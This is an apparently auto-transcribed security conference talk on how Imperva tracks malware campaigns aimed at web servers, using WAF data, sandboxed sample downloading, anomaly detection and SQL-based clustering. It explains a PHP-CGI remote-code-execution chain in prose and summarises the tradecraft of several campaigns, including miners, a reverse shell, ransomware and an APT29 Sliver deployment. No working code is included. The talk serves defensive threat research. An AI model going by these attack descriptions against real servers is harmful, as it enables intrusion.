Real-World Malware Campaign Tracking Using Big Data Analytics And ML Clustering - Daniel Johnston

BSides Prague33:0799 viewsPublished 2025-04Watch on YouTube ↗

Speakers

Daniel Johnston

Tags

CategoryTechnical

StyleTalk

Show transcript [en]

So hi everyone. Um I want to thank you for joining me for uh my talk today uncovering malware targeting your web applications where I'll be talking about uh real world malware campaign tracking using big big data analytics and machine learning clustering. Um so I want to give a a shout out to the organizers of the event. It's it's been great so far. I've really enjoyed it and I know that this is the slot after lunch. So I hope that there's enough that's interesting in here to to keep you awake for the next uh 30 35 minutes or so. So okay, I want to start by asking a couple of questions and those are have you ever wondered how threat actors can

leverage your vulnerable web servers to spread malware and achieve their malicious goals through widespread campaigns? Have you ever wondered about the techniques that they use, the vulnerabilities that they exploit, and the samples that they deploy? You might even have wondered how you can detect and expose this activity in your own data sets. Well, over the past year, uh, Imper Threat Research, which is the team I'm a part of, has been working to expose uh to answer some of these questions and we're going to share some of the frameworks that we've developed and uh some campaigns that we've uncovered with you in the talk today. So just a bit about me. Uh my name is Daniel Johnston. I've um I'm a re uh

security researcher within the threat research group Adam Herva. I've been uh in the team for about 6 years. Um and my interest my domains of specialty are web application security, bot detection, and malware analysis with threat intelligence. So if anyone has any interest in in those domains, I'd be happy to to chat to you. I'll be floating about throughout the day. So um originally this this research was a collaborative effort between myself and a very talented uh data scientist with within the threat research group that that I'm a part of as well. Um unfortunately he couldn't be with me today as he's pres presenting in Black Hat Asia. Um so he's in Singapore at the

minute. Um so I'll have to try and muddle through this this talk uh without him. Okay. So the agenda uh in the introduction I'm going to be talking a bit about how threat actors can leverage vulnerable web servers uh in order to uh deploy malicious malicious samples and achieve their malicious goals. Um and then I'm going to be talking about some of the data that we collect at Emperva. Um how we collect that data, what is significance of that data and then what we do with it. Then I'm going to move on and I'm going to talk about a framework that we've developed for automating malware handling. Um so I'm going to talk about how we identify malicious

samples in a large HTTP data set and then how we handle those samples uh in an autonomous way. Uh then I'm going to talk uh move on and talk about uh malware campaign identification using uh anomaly detection and machine learning clustering. And then finally I'll talk about some of the campaigns that we've uh been able to identify using the uh the frameworks that we've developed. Okay. So let's let's dive in into the introduction. So in um in Adam Perva one of the flagship products that we have is our cloud web application firewall. And the idea behind the cloud web application firewall or cloud w is to mitigate malicious attacks or malicious requests from malicious actors while

simultaneously allowing legitimate requests from legitimate actors to pass through and reach the origin web server. We see around 3 billion malicious requests every day which we store as events in our threat research data lakeink. So as you can imagine uh that's a vast quantity of data that we can then leverage for threat intelligence purposes and it's something that we get really very excited about because of all the possibilities that that affords us. Obviously there's a lot of work in order to be able to extract value from a large data set like that and that's what I'm going to be uh outlining over the next uh 2530 minutes or so. So I I want to take a minute and talk a

bit about how threat actors leverage web vulnerabilities for their own malicious purposes and their own malicious goals. So in our work at Emperva, we see many different types of threat actor uh leveraging many different web vulnerabilities um in the pursuit of of different objectives to achieve or to attempt to achieve uh certain goals. And obviously there there's a lot of other um web vulnerabilities and and objectives and goals, but um these are just some examples. So for example, a thread actor can use a cross-ey scripting vulnerability to steal session cookies or session tokens uh in order to achieve account takeover to then uh expose sensitive data and then sell that in in some kind of a dark market um as we've

seen in in in previous talks today already. But the chain that we're most interested in is the use of RC web vulnerabilities in order to deploy malware uh in order to achieve goals like extortion through ransomware, deployment of crypto miners to use uh the resources of vulnerable web servers to mine cryptocurrency and make threat actors some money or uh botnet deployment to then launch further volutric attacks uh down the line. So, um I want to draw attention actually for a minute to a report that was released by Verizon Business. It's actually already been mentioned today in in um I think it was the uh the keynote talk. Um but in in that report, the data

breach investigation report, they outline just how important of a target web applications are for threat actors in today's landscape. So in that report they outline that the top action vectors in data breaches in uh 2023 to 2024 can be like 40% of of those can be attributed to web applications. Furthermore in the report they they say that for non-error and non-misuse breaches over 20% can be attributed to the exploitation of vulnerabilities in web applications. So that just gives you a bit of an idea of how big of a target web applications are for threat actors today. Um, also in that report they outline vulnerabilities um, uh, web vulnerabilities that have been instrumental in data breaches over the

past couple of years. And those include vulnerabilities in Atlassian, Move It, Manage Engine, and Sugar CRM. All of which we're very familiar with in our work at Imperva and we've been working to mitigate them over the past couple of years. Okay, so at this stage I want to show you a bit of an example of uh an RC vulnerability exploit that we would see in our day-to-day atmperva. It's an RC attempt of CV 20244577 and some of you might already recognize it as an exploit attempt of the PHPCGI uh vulnerability that was uh disclosed early in 2024. So this particular vulnerability allows a thread actor to inject a URL encoded soft hyphen to the query string of the

request. And what this allows the attacker to do is to append additional query string parameters which will then tell the web server to interpret the post body of the request as PHP code and execute it on the server. So in this case the attacker is invoking PHP system. I hope you can see that. Okay. in order to then invoke MSHTA to download and run a Microsoft HTML application um which might be JScript or VSScript enabled which will then allow the attacker to run further arbitrary code on the on the infected server and this this is a great example but there's some very clear limitations from this we cannot deduce what the threat actor is trying to do because we don't know what

the file is that's being downloaded um We therefore uh don't know what the sample is and what the attacker is trying to achieve. And that leads me on to talk about the limitations that we have in the data that we collect at Emperva. So we have no access to endpoints. We have no visibility uh over um endpoints like u uh like other vendors do and therefore we only really have visibility over the first four links in the cyber kill chain. Again, something that's been outlined in earlier talks. um we don't have any visibility over uh the installation of malware on an asset for example. We don't have any visibility over the communication between an infected server

and uh a command and control server and therefore we cannot deduce any objectives of of the attacker um what they're trying to achieve etc. Therefore enrichment is clearly required in order to be able to reveal the intent of malicious actors in our data set. So that leads me on to talk about the framework that we've developed for automating malware handling. So this is a very high level diagram of the framework that we've developed and um so let let's start from from left to right. We obviously at Pervvis see many different thread actors um leveraging many different web vulnerabilities um and they send that to sites or they attack sites and services on boarded to the emperor cloud w

um so we store those uh malicious requests as events in our threat research data lakeink and it it equates to billions and billions of events. So we apply some fairly sophisticated queries and ETLs to be able to extract the malicious URLs from that large data set. We take those URLs to a sandboxed environment completely isolated from a production environment. We download them, process them, and hash them and store them in in an isolated cloud storage. But for each sample that we analyze, we create a a log um containing the the metadata for each of the samples, which we will then reimpport back into the data lakeink to be able to crosscorrelate between web application events and uh and the malicious samples

that the attackers are attempting to deliver. Then what we do is we enrich that data from threat intelligence sources such as virus total. So that gives us a very rich picture um of what thread actors are trying to achieve um through through their exploitation attempts. Okay. So just a few words about the downloader uh within the framework that we developed. So it's obviously completed completely isolated from our production environment. We don't want to be downloading malicious samples uh within our production environment and potentially risk our our uh key assets. And it's a dockerized python service which serves to uh download uh analyze compress and store each of the samples. And we store each sample with

the named with the SHA 256 hash which allows us to then retrieve the the sample and perform manual analysis if required in the future. Uh so baked into the downloader we have something that we call second stage URL detection. And so for for many uh samples that are targeting web servers specifically, they're often textual in nature. So what what I mean by that, they're often bash scripts or PowerShell scripts that act as second stage downloaders for second stage binaries. Um so what we what we did in order to try and extract the URLs from these textual samples was we used to apply a regular expression to try and uh parse out each of the URLs and then uh

download them with a downloader. But we soon realized that this isn't a great solution because URLs can be split across several parameters and and therefore a regular expression is not going to really cut it. So what we came up with was um LLM second stage URL detection. So for for any problem in today's world, what do you do? You take it and you fire it at an LLM and you hope for the best. Um but so what we did was we we take the content of the textual sample and provide it with a prompt to uh an LLM like chat GPT and generally 99% of the time it's very very successful at being able to parse out that second stage URL

and we can then download it and store it in our isolated cloud storage environment. Okay. So just to summarize the um the system that we developed for for automating the download downloading of malware samples. Obviously at Perva we have a large volume of HTTP data that we store in our threat research data lakeink. Then we extract the the malicious URLs using uh ETLs and queries and we take those samples and we download them in an isolated environment. We create metadata for each of those samples and we reimpport that into the data lakeink to be able to crossorrelate between um between uh the the web the web application attacks and and the malicious samples. Then the

final piece is the enrichment from threat intelligence sources where we enrich from uh places like virus total sandboxes and honeypotss in order to get a rich volume of data that we can then apply further processing to and extract value from it. Okay. So in this part of the talk, I want to change gear just just a bit and I'm going to talk in technical terms about some of the um some of the frameworks that we've developed to be able to extract data from this large data set that we have. Um so I I will say that this part of the talk was uh supposed to be given by my my uh colleague AI but um unfortunately

as he's not able to be with me today I I'll be trying to muddle through without him. So I'm going to be talking about the anomaly detection and the machine learning clustering that we apply to this large volume of HTTP uh data that we collect. Okay. So here is an example uh so I'm I'm going to start with the anomaly detection and here is an example of uh an anomaly that we have identified in this large data set that we collect. Um so what what's shown in the chart is um an anomaly in exploit the exploitation of a specific CVE by a specific um HTTP client. And what you see is a fairly even dist distribution

or a fairly even pattern over time until you get to uh around the 2nd of October in 2024 where you see a massive spike of almost 500%. And essentially what this gives us is an opportunity to drill down into the data and understand why the anomaly occurred in the first place. We we get to understand what the threat actor is trying to achieve, who the targets are, and and what exactly is is going on behind it. So here's a second example of an anomaly that we have identified in our in our data. It's uh it's slightly different to the first one. This is tracking injected domains or injected URLs into HTTP into malicious HTTP requests over time. And what you can see

is again a fairly even pattern until you reach the end of August where we see a massive increase of over 600%. And again, this provides us with the opportunity to deep dive uh into the into the data behind it and and then understand what the threat actor is trying to do um who's being targeted and so on. Um so these anomalies provide us with with the opportunity of of firstly identifying malicious patterns and then being able to understand them more fully. So how is it that we actually are able to generate these anomalies? Well, we have a completely serverless architecture. We have a managed SQL engine which is Trino and a managed cloud function to do the collection, the

aggregation and the anomaly detection. We have hundreds of of counters with which to monitor the anomalous activity resulting in over 20 million anomalies at at any given time. Uh so how is it that we we can do this? Well, this is the data flow uh for our anomaly detection system. And as I mentioned previously in the talk, our threat research data lake has thousands of tables and terabytes of data. And what we do is we read the data from the source tables into a dedicated counters table. And we perform this operation only once. Um why why do we do that? It's because it's a very he heavy operation that requires a lot of aggregation and a lot of filtering. and

therefore it requires a lot of resources. So we only want to do it one time. But once the data is in the counters table, we use cloud functions um to do the to do further aggregation and identify the anomalies um which I'll explain a bit later. But the key thing is that everything is done within the dedicated dedicated counters table and this allows us to uh query using our query engine and makes it readily available to our analysts.

So how is it then that our researchers can define a counter uh within this anomaly detection framework? We have a a dedicated JSON configuration file called a data set which is essentially a list of counters that that our researchers can define where each counter is an SQL statement for getting data. So for example, we might want to track a client over time or an exploded CVO over time or any combination within the the data set that we have uh and the data that we collect at imperva. So we then group by each key to get the hourly, daily or weekly count uh for each counter. Uh so for example we might define a data set for an exploded

CVE where we would have counters for uh exploited CV exploded CV plus HTTP client or exploded CVE plus injected domain or IP and we have thousands of these counters that that we're tracking at any given time. So how exactly then do we do the anomaly detection? Again, we use a completely serverless architecture, a managed query engine and managed cloud functions and no servers. And we use SQL and the baked in features of the Trino query engine to be able to do it. So at this stage I want to appeal to you to actually uh take a look at the query engines uh available to you within your own environments uh and your own infrastructure because uh query engines

are very very rich today and and there's more than likely going to be some functions in there that might help you do exactly the same thing and apply these to your own use cases. Okay. So, uh let's look at an example of of how we then do the anomaly detection using SQL. Um so this example is uh uh the identification of anomalies based on the distance from average. And the first thing that we do is to collect the data from our data set. Uh the data is already collected and stored within the counters table. Um so we can query the data for a specific data set, all of the keys and all of the counters and hold

them in memory for a specified period of time. let's say 90 days. Uh so then we can calculate the statistics. In this case, we calculate the average of the data per counter plus the standard deviation. Uh and then the last stage is obviously to calculate the anomalies. So for this example, an anomaly is any value that's larger than the standard deviation or than the average plus two times the standard deviation. Sorry. And what this means is that for any given counter, we can identify suspicious activity where uh it spiked within the defined period of time. Uh so it's important to note that we traverse uh billions of records and the data doesn't leave the database. So billions of

records in just minutes. It's pretty cost effect uh effective and efficient. Okay. So I want to move on to uh talk about malware clustering. Uh so why are we actually doing malware or clustering of malware injection records to begin with? Well, we see millions of requests every day um where attackers are attempting to inject malware using web vulnerabilities. And we can't simply hand these millions of records to our analysts and expect them to uh evaluate them and analyze them in an efficient and effective manner. They just wouldn't get anything done. They wouldn't be able to prioritize them. So um we need some way of providing a summary of the attacks um which can be then handled quickly and effectively. So

you can see here how thousands or tens of thousands of records have been uh clustered into a single record where we we have the start time, the extracted URL and the count of attacks plus many other uh fields that that I haven't actually added to this slide but um we can then take that and and give them to our our analysts. So, how do we do this? Again, we're using this the serverless stack that we know and love. Um, we're using uh our managed query engine and managed cloud functions. And in this case, the query engine allows us to group individual attacks or individual records into uh uh basically attacks. Um, so we can then

calculate these the distances between the aggregated attacks. um and then generate the the clusters from that. So in the next slide I'll show you a bit more about how we do that. But both the the grouping and the distance calculations are are heavy operations. Um but we can do it using SQL. So the data doesn't ever leave the database and we don't need additional processes or um or or servers or services in order to be able to do it. So it's pretty cost effective. Um so once we have the distances calculated we save the data into an object store where it's moved to the next step which is the the clustering algorithm. So generally within a few

minutes we have our clusters calculated using this method. So in summary we take the distances we load them into memory and we run the clustering algorithm and then we put the results back into the object store. Once these results are in the object store, um we can then again use SQL uh to group similar clusters into ongoing malware campaigns that we can then provide to our analysts for review. So then how do we do the distance calculations? Um again we're using SQL for this. So it makes it much more cost effective than the alternative of pulling out data into into different systems uh or services for example and using data frames. Um so let let's look

at an example of what we're doing. We take the attack data and we calculate the distance between every pair of distinct attacks and we do this by doing a self join um allowing us to calculate the distance between every distinct pair of records. So by by comparing the record on the left side of the join with the record on the right side of the join, we can use many different features to determine the distance between uh two attacks. Um we use this uh so for in this example we're we're checking if it's the same HTTP client and we're also using several functions of the Trino query engine uh to be able to calculate uh distances as well. So um for example

we're using Leven distance uh to calculate the distance between two URL paths and we're also using uh cosign similarity in order to calculate the distance between uh two histograms of of target sites for example. Um so I should say that during the development of this it obviously took a lot of tuning and a lot of finetuning of both the um both the queries and of the clustering algorithm to be able to get it just right. Um, and of course we have many other features other than the ones that we're showing here, but this is just broadly how it works. Okay. So, I want to I want to move on and talk about some of the real

world campaigns that we've been able to identify using the the frameworks that we've uh that we've developed. Okay. So, um, yep. Uh, so obviously I can't go through all of the campaigns that we've identified. Um, so there are a few here that that I'm obviously not going to talk about and I won't be able to go into like very great detail in any of them. So, uh, if you want to check out more detail about them, they're obviously published in our Impera blog which which is available on imperva.com. So, the first one I want to start with is that of the CISRV botnet. Um this is a well-known botnet malware written in Go and it's spread using uh

various different well-known web vulnerabilities. So what we observed was the exploitation of vulnerabilities in the Flassian Confluence and Apache Struts that were used to deploy this this campaign and this malware. Um, so the the goal behind the the campaign is to deploy the XMR rig cryptominer in order to use this the resources of an infected uh web server uh to mine cryptocurrency and make attackers and threat actors some money. Uh so we were we were able to use the infrastructure and the uh services that we created in order to identify new TPS and new IOC's that weren't already that weren't previously uh available in in the public domain. we were able to aggregate all of the web application

events, the the web web requests and the attacks and also along with the samples um and then be able to analyze it in a very effective and efficient way and we were also able to identify the use of a Google site Google sites domain hosting the second stage binary of this attack. So as you can see in the screenshot on the right hand side, you can see what looks like a generic Google 404 error page actually contains uh the encoded byes of um of a of the second stage binary. So the second campaign that I want to talk about is that of the G-Socket PHP botnet and this is one that we observed in the second half of 2024.

It's a hugely widespread malware campaign targeting uh tens of thousands of PHP web servers. We observe millions of requests containing a payload attempting to install the G-Soft reverse shell um which is a tool which allows attackers to maintain persistence um on an infected host even after the original vulnerability or the original uh back door has been patched. Uh a deep dive into the campaign actually revealed a link to the propagation of uh Indonesian gambling using search engine optimization uh probably in response to a government crackdown on on online gambling um in Indonesia. So again there's full details of this campaign in our blog and you'll be able to check that out. So the third campaign that I want to

talk about is that of uh tell you the past ransomware uh which we observed um utilizing the PHPCGI vulnerability that I actually outlined earlier in the talk. Um so this is a ransomware campaign targeting PHP server specifically which isn't something that's that's sort of typical in in today's landscape but it's deployed via via a VBScript enabled Windows HTML application. Um and it it contained the offiscated bytes of a net binary. Um so you can see in the screenshot on the right hand side the s parameter actually contains the encoded bytes of the net binary that we were able to extract and decode and load into dnspy in order to be able to understand what the sample

was actually doing. So upon execution it would enumerate the files on the file system uh encrypt files and then publish a ransom note to the web route of uh the PHP server. Um again it's uh was quite an interesting one to to find because it targeted specifically PHP servers for for ransomware deployment. Okay. Okay. So, the final campaign that I want to talk about is that of um that one that we believe we can attribute to AP29. So, AP29, also known as Cozy Bear, is a threat group uh that's that's associated with the Russian SVR or foreign intelligence service, and they've been associated with many notorious cyber attacks over the past few years, including the Solar Wind

supply chain attacks and the mass exploitation of Jeopardy and Team City servers uh last year. So in March of this year, we observed a very coordinated and very targeted attack against uh Polish government uh assets and a further uh attack that we observed in November was um targeting Ukrainian financial institutions. So the attack involved the exploitation of uh F F5 big IP vulnerability, a vulnerability in a well-known load balancer application in order to attempt to deploy uh Sliver the Sliver implant. So for those of you are unfamiliar, Sliver is an an open source alternative to Cobalt Strike developed by Bishop Fox and it allows for a range of post exploitation activities on an infected host uh such as information gathering

and um further uh arbitrary command execution. So how is it that we we were able to then attribute this activity to AP29? Well, there's three reasons. Sliver is a known TTP of APT29 according to MITER and Cyber Reason. So it makes sense if they used those particular tools in the past that they' use it in in this campaign as well. Secondly, the C2 that we observed is linked with previous AP29 Jet and Team City campaign activity. Um so yeah um again uh if the piece of in infrastructure was used in the past in past campaigns attributed to APT29 then if we observed it in this one it's it's a good indication that it's um that it

is that threat actor and then thirdly only targets of interest to the Russian state were implicated in this particular campaign. So Ukrainian uh Ukrainian financial institutions and Polish government websites gives a strong indication that this is a a Russian threat actor. Okay. So on to the conclusion and takeaways. So we have three main takeaways I think we can we can take from from this talk. Firstly, automation, big data analytics and anomaly detection provide excellent tools for threat hunting at scale. And I hope that through the um through what what I've talked about in in the slides and in this presentation, you can take away some ideas that you'll be able to apply to your own uh data sets that you

have. Secondly, threat actors such as the ones demonstrated are regularly leveraging web vulnerabilities for malware deployment. And this is something that we're seeing day in and day out in our work at Imperva. Um, and it's also something that's backed up by the data breach investigation report that I outlined earlier. And then thirdly, the identification, the correlation and tracking of malware campaigns has great uh and real community value. And it's something that we're seeing as we're publishing blogs um from these from these uh from this infrastructure that we've created um that they're very well received by the public and and by the community in general because it allows then the IOC's and the TTPs that are published in those

blogs to be used in in other investigations in other organizations. Okay. So that is all that I have for for today's talk. I want to thank you for listening and if if anyone has any questions, I'll be floating about here. So, please feel free to um to come and chat to me. Thank you.

Real-World Malware Campaign Tracking Using Big Data Analytics And ML Clustering - Daniel Johnston

Related talks